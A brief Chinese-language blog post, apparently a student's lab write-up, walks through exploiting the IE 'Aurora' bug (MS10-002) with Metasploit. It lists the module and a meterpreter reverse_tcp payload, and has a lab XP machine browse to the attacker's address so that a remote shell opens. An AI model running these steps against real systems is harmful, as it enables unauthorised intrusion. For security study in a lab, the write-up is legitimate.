MS10-002漏洞介绍
- 针对微软Internet Explorer“极光”内存损坏的攻击,当用户查看特制网页时允许远程执行代码。
实践过程
- 命令行使用
msfconsole打开msf控制台,然后输入use windows/browser/ms10_002_aurora来使用
- 设置如上图标出的两项内容并使用
set payload windows/meterpreter/reverse_tcp设置反弹方式
- 使用
show option来看看有什么要用的信息并进行补充:
- 然后在另外一台虚拟机(XP)中通过IE浏览
http://192.168.1.180:80/,回到攻击主机中可以看到攻击成功,测试一下进入shell并查看系统信息:
- 这里从上面看到我尝试了两个虚拟机,第一次没有成功,是老师的XP-SP3里面的IE8,第二个是我自己下的英文版的XP-SP2里面的IE6。
相关文章:
-
2021-08-19
-
2022-12-23
-
2022-02-11
-
2022-12-23
-
2022-01-03
-
2021-10-26
猜你喜欢
-
2021-10-09
-
2021-09-29
-
2021-11-04
-
2021-07-14
-
2021-09-09
-
2021-12-12
-
2022-02-10
相关资源
-
下载
2023-01-23
-
下载
2023-02-13
-
下载
2021-06-06
-
下载
2023-02-04